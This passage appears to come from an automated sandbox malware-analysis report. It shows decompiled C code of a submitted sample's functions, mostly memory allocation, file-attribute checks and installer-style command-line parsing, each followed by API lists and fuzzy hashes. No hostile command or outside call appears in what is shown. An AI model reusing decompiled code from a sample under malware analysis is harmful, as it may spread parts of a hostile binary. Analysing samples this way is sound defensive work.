                                                                                                                                                                                                                                              					E001A44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                              					 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              					_t9 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x001a6229
                                                                                                                                                                                                                                              0x001a6230
                                                                                                                                                                                                                                              0x001a6247
                                                                                                                                                                                                                                              0x001a626a
                                                                                                                                                                                                                                              0x001a6272
                                                                                                                                                                                                                                              0x001a6249
                                                                                                                                                                                                                                              0x001a6255
                                                                                                                                                                                                                                              0x001a625f
                                                                                                                                                                                                                                              0x001a6264
                                                                                                                                                                                                                                              0x001a6264
                                                                                                                                                                                                                                              0x001a6284

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001A623F
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                                • Part of subcall function 001A6285: GetLastError.KERNEL32(001A5BBC), ref: 001A6285
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 381621628-0
                                                                                                                                                                                                                                              • Opcode ID: 8086d38c1c25ec11157e92ec96c7acc8303dee125c54b86517dc02f6802915e8
                                                                                                                                                                                                                                              • Instruction ID: 0b8aac681d47f45aac4fd57cea2201432c345edbeaeabff54e919ceca95d0507
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8086d38c1c25ec11157e92ec96c7acc8303dee125c54b86517dc02f6802915e8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8F0E2B4704208ABE750EF748D02FBE33BCDBA6300F40006AB98ADA081EF749D848690
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A4B60(signed int _a4) {
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(_t15 + 0x1a8d64)) != 1) {
                                                                                                                                                                                                                                              					_t9 = FindCloseChangeNotification( *(_t15 + 0x1a8d74)); // executed
                                                                                                                                                                                                                                              					if(_t9 == 0) {
                                                                                                                                                                                                                                              						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *((intOrPtr*)(_t15 + 0x1a8d60)) = 1;
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x1a8d60)) = 1;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x1a8d68)) = 0;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x1a8d70)) = 0;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x1a8d6c)) = 0;
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                              0x001a4b66
                                                                                                                                                                                                                                              0x001a4b74
                                                                                                                                                                                                                                              0x001a4b98
                                                                                                                                                                                                                                              0x001a4ba0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4bac
                                                                                                                                                                                                                                              0x001a4ba4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4ba4
                                                                                                                                                                                                                                              0x001a4b78
                                                                                                                                                                                                                                              0x001a4b7e
                                                                                                                                                                                                                                              0x001a4b84
                                                                                                                                                                                                                                              0x001a4b8a
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,001A4FA1,00000000), ref: 001A4B98
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                                                                              • Opcode ID: 754844c900644531640fcfb342a18f226a2f6362670e1f85c515d678f95cd6bc
                                                                                                                                                                                                                                              • Instruction ID: af546c56c5fcae7dcba4a4836ef6d6ac42dda4c28be13aebb98ecf3053371910
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 754844c900644531640fcfb342a18f226a2f6362670e1f85c515d678f95cd6bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68F01C35910B089FC7719FBACC00653BFE4BBE7365710093E946ED2194EB70A851CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A66AE(CHAR* __ecx) {
                                                                                                                                                                                                                                              				unsigned int _t1;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                              				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                              					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}




                                                                                                                                                                                                                                              0x001a66b1
                                                                                                                                                                                                                                              0x001a66ba
                                                                                                                                                                                                                                              0x001a66c7
                                                                                                                                                                                                                                              0x001a66bc
                                                                                                                                                                                                                                              0x001a66be
                                                                                                                                                                                                                                              0x001a66be

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,001A4777,?,001A4E38,?), ref: 001A66B1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                              • Opcode ID: 0fdfc24038b1230f9b9bae8912da6dc9079c7ccdcd34e868eb117b3b571bc1b4
                                                                                                                                                                                                                                              • Instruction ID: 66209d9fc506924ae8c95ce698327f437566a32d6cac17c5b6cbcc9198cf1774
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fdfc24038b1230f9b9bae8912da6dc9079c7ccdcd34e868eb117b3b571bc1b4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADB0927A262840426A6006316C295562841ABC263A7E81B90F036C05E0CB3EC886D004
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A4CA0(long _a4) {
                                                                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                                                                              			}




                                                                                                                                                                                                                                              0x001a4caa
                                                                                                                                                                                                                                              0x001a4cb1

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000000,?), ref: 001A4CAA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocGlobal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3761449716-0
                                                                                                                                                                                                                                              • Opcode ID: 98601e680f2f83fcb72645e197cf4d384677cafb4c77a2f5a31de0aa101acfd7
                                                                                                                                                                                                                                              • Instruction ID: fece3f1fef98cf371d56abfb5dc461f42019241ca066ceee53eaccebfa0672d8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98601e680f2f83fcb72645e197cf4d384677cafb4c77a2f5a31de0aa101acfd7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08B0123204420CB7CF411FC2EC09F853F1DEBC9761F540000F60C454508B729450C796
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A4CC0(void* _a4) {
                                                                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                                                                              			}




                                                                                                                                                                                                                                              0x001a4cc8
                                                                                                                                                                                                                                              0x001a4ccf

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeGlobal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2979337801-0
                                                                                                                                                                                                                                              • Opcode ID: cdaa7c3ae781d66f1a82f5b2afce94bd7d09beb0e238c85a6b32ad631f0aaa32
                                                                                                                                                                                                                                              • Instruction ID: 3955ec382897b01c9d454f0df65ff261109e7775fc0431fd87d86a076e06391e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdaa7c3ae781d66f1a82f5b2afce94bd7d09beb0e238c85a6b32ad631f0aaa32
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19B0123100010CB78F011B52ED088453F1DDBC52607400010F50C414218B339851C585
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                                              			E001A5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                                                              				CHAR* _v265;
                                                                                                                                                                                                                                              				char _v266;
                                                                                                                                                                                                                                              				char _v267;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				CHAR* _v272;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				signed int _v296;
                                                                                                                                                                                                                                              				char _v556;
                                                                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                                                                              				int _t63;
                                                                                                                                                                                                                                              				char _t67;
                                                                                                                                                                                                                                              				CHAR* _t69;
                                                                                                                                                                                                                                              				signed int _t71;
                                                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                                                              				char _t79;
                                                                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				intOrPtr _t88;
                                                                                                                                                                                                                                              				void* _t100;
                                                                                                                                                                                                                                              				intOrPtr _t101;
                                                                                                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                                                                                                              				intOrPtr _t105;
                                                                                                                                                                                                                                              				void* _t111;
                                                                                                                                                                                                                                              				void* _t115;
                                                                                                                                                                                                                                              				CHAR* _t118;
                                                                                                                                                                                                                                              				void* _t119;
                                                                                                                                                                                                                                              				void* _t127;
                                                                                                                                                                                                                                              				CHAR* _t129;
                                                                                                                                                                                                                                              				void* _t132;
                                                                                                                                                                                                                                              				void* _t142;
                                                                                                                                                                                                                                              				signed int _t143;
                                                                                                                                                                                                                                              				CHAR* _t144;
                                                                                                                                                                                                                                              				void* _t145;
                                                                                                                                                                                                                                              				void* _t146;
                                                                                                                                                                                                                                              				void* _t147;
                                                                                                                                                                                                                                              				void* _t149;
                                                                                                                                                                                                                                              				char _t155;
                                                                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                                                                              				void* _t162;
                                                                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                                                                              				char _t167;
                                                                                                                                                                                                                                              				char _t170;
                                                                                                                                                                                                                                              				CHAR* _t173;
                                                                                                                                                                                                                                              				void* _t177;
                                                                                                                                                                                                                                              				intOrPtr* _t183;
                                                                                                                                                                                                                                              				intOrPtr* _t192;
                                                                                                                                                                                                                                              				CHAR* _t199;
                                                                                                                                                                                                                                              				void* _t200;
                                                                                                                                                                                                                                              				CHAR* _t201;
                                                                                                                                                                                                                                              				void* _t205;
                                                                                                                                                                                                                                              				void* _t206;
                                                                                                                                                                                                                                              				int _t209;
                                                                                                                                                                                                                                              				void* _t210;
                                                                                                                                                                                                                                              				void* _t212;
                                                                                                                                                                                                                                              				void* _t213;
                                                                                                                                                                                                                                              				CHAR* _t218;
                                                                                                                                                                                                                                              				intOrPtr* _t219;
                                                                                                                                                                                                                                              				intOrPtr* _t220;
                                                                                                                                                                                                                                              				signed int _t221;
                                                                                                                                                                                                                                              				signed int _t223;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t173 = __ecx;
                                                                                                                                                                                                                                              				_t61 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                                                                              				_t209 = 1;
                                                                                                                                                                                                                                              				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                              					_t63 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					while(_t209 != 0) {
                                                                                                                                                                                                                                              						_t67 =  *_t173;
                                                                                                                                                                                                                                              						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                              							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_v272 = _t173;
                                                                                                                                                                                                                                              						if(_t67 == 0) {
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t69 = _v272;
                                                                                                                                                                                                                                              							_t177 = 0;
                                                                                                                                                                                                                                              							_t213 = 0;
                                                                                                                                                                                                                                              							_t163 = 0;
                                                                                                                                                                                                                                              							_t202 = 1;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								if(_t213 != 0) {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t69 =  *_t69;
                                                                                                                                                                                                                                              									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t69 = _v272;
                                                                                                                                                                                                                                              										L21:
                                                                                                                                                                                                                                              										_t155 =  *_t69;
                                                                                                                                                                                                                                              										if(_t155 != 0x22) {
                                                                                                                                                                                                                                              											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                              												goto L106;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                              												_t177 = _t177 + 1;
                                                                                                                                                                                                                                              												_t202 = _t202 + 1;
                                                                                                                                                                                                                                              												_t157 = 1;
                                                                                                                                                                                                                                              												goto L30;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                              												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                              													L106:
                                                                                                                                                                                                                                              													_t63 = 0;
                                                                                                                                                                                                                                              													L125:
                                                                                                                                                                                                                                              													_pop(_t210);
                                                                                                                                                                                                                                              													_pop(_t212);
                                                                                                                                                                                                                                              													_pop(_t162);
                                                                                                                                                                                                                                              													return E001A6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                              													_t177 = _t177 + 1;
                                                                                                                                                                                                                                              													_t202 = _t202 + 1;
                                                                                                                                                                                                                                              													_t157 = 2;
                                                                                                                                                                                                                                              													goto L30;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t157 = 1;
                                                                                                                                                                                                                                              												if(_t213 != 0) {
                                                                                                                                                                                                                                              													_t163 = 1;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t213 = 1;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L30;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L131;
                                                                                                                                                                                                                                              								L30:
                                                                                                                                                                                                                                              								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                              								_t69 = _v272;
                                                                                                                                                                                                                                              							} while ( *_t69 != 0);
                                                                                                                                                                                                                                              							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                              								E001A6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                              								asm("int3");
                                                                                                                                                                                                                                              								_push(_t221);
                                                                                                                                                                                                                                              								_t222 = _t223;
                                                                                                                                                                                                                                              								_t71 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                              								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                              									0x4f0 = 2;
                                                                                                                                                                                                                                              									_t75 = E001A597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E001A44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                              									 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              									_t75 = 0;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								return E001A6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                              								if(_t213 == 0) {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										goto L34;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L40;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										L40:
                                                                                                                                                                                                                                              										_t79 = _v268;
                                                                                                                                                                                                                                              										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                              											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                              											if(_t83 == 0) {
                                                                                                                                                                                                                                              												_t202 = 0x521;
                                                                                                                                                                                                                                              												E001A44B9(0, 0x521, 0x1a1140, 0, 0x40, 0);
                                                                                                                                                                                                                                              												_t85 =  *0x1a8588; // 0x0
                                                                                                                                                                                                                                              												if(_t85 != 0) {
                                                                                                                                                                                                                                              													CloseHandle(_t85);
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												ExitProcess(0);
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t87 = _t83 - 4;
                                                                                                                                                                                                                                              											if(_t87 == 0) {
                                                                                                                                                                                                                                              												if(_v266 != 0) {
                                                                                                                                                                                                                                              													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              														goto L49;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                              														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                              														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                              														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                              														_t202 = _t50;
                                                                                                                                                                                                                                              														do {
                                                                                                                                                                                                                                              															_t88 =  *_t183;
                                                                                                                                                                                                                                              															_t183 = _t183 + 1;
                                                                                                                                                                                                                                              														} while (_t88 != 0);
                                                                                                                                                                                                                                              														if(_t183 == _t202) {
                                                                                                                                                                                                                                              															goto L49;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t205 = 0x5b;
                                                                                                                                                                                                                                              															if(E001A667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                              																L115:
                                                                                                                                                                                                                                              																_t206 = 0x5d;
                                                                                                                                                                                                                                              																if(E001A667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                              																	L117:
                                                                                                                                                                                                                                              																	_t202 =  &_v276;
                                                                                                                                                                                                                                              																	_v276 = _t167;
                                                                                                                                                                                                                                              																	if(E001A5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                              																		goto L49;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		_t202 = 0x104;
                                                                                                                                                                                                                                              																		E001A1680(0x1a8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t202 = 0x5b;
                                                                                                                                                                                                                                              																	if(E001A667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                              																		goto L49;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		goto L117;
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																_t202 = 0x5d;
                                                                                                                                                                                                                                              																if(E001A667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                              																	goto L49;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	goto L115;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													 *0x1a8a24 = 1;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L50;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t100 = _t87 - 1;
                                                                                                                                                                                                                                              												if(_t100 == 0) {
                                                                                                                                                                                                                                              													L98:
                                                                                                                                                                                                                                              													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              														goto L49;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                              														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                              														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                              														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                              														_t202 = _t38;
                                                                                                                                                                                                                                              														do {
                                                                                                                                                                                                                                              															_t101 =  *_t192;
                                                                                                                                                                                                                                              															_t192 = _t192 + 1;
                                                                                                                                                                                                                                              														} while (_t101 != 0);
                                                                                                                                                                                                                                              														if(_t192 == _t202) {
                                                                                                                                                                                                                                              															goto L49;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t202 =  &_v276;
                                                                                                                                                                                                                                              															_v276 = _t170;
                                                                                                                                                                                                                                              															if(E001A5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                              																goto L49;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                              																_t218 = 0x1a8b3e;
                                                                                                                                                                                                                                              																_t105 = _v276;
                                                                                                                                                                                                                                              																if(_t104 != 0x54) {
                                                                                                                                                                                                                                              																	_t218 = 0x1a8a3a;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              																E001A1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                              																_t202 = 0x104;
                                                                                                                                                                                                                                              																E001A658A(_t218, 0x104, 0x1a1140);
                                                                                                                                                                                                                                              																if(E001A31E0(_t218) != 0) {
                                                                                                                                                                                                                                              																	goto L50;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	goto L106;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                              													if(_t111 == 0) {
                                                                                                                                                                                                                                              														if(_v266 != 0) {
                                                                                                                                                                                                                                              															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																goto L49;
                                                                                                                                                                                                                                              															} else {
